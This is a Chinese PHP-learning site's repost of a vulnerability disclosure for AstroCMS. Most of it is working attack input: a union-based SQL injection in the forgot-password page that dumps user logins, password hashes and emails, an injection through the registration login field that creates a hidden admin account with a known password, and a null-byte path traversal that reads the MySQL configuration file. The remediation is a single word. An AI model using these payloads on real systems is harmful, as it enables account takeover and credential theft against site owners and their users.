网站地图    收藏   

主页 > 后端 > 网站安全 >

AstroCMS多重远程缺陷及修复 - 网站安全 - 自学ph

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: AstroCMS Multiple Remote Vulnerabilities作者: brain[pillow]下载地址: http://www.astrocms.com/忘记密码处注射:/registration/forgot/a#39; union select 0,0,0,0,concat_ws(0x3a,login,pa......

标题: AstroCMS Multiple Remote Vulnerabilities 

作者: brain[pillow] 
下载地址: http://www.astrocms.com/ 
忘记密码处注射:
  

 /registration/forgot/ 

  

 a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5# 

  

id=6 - usually admin 

  

============================================================ 

用户注册处:

============================================================ 

 /registration/ 

  

adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')# 

  

www.2cto.com Submitting this to "login field" will add "adrnin" user with admin rights and password "123123". 

Usually 5 - is admin group. 

  

============================================================ 

内容页:

============================================================ 

  

 /include/get_js.php4?fname=../htdocs/include/config_mysql.inc%00.js 

  

或者: 

  

 /include/get_js.php?fname=../htdocs/include/config_mysql.inc%00.js


修复:过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论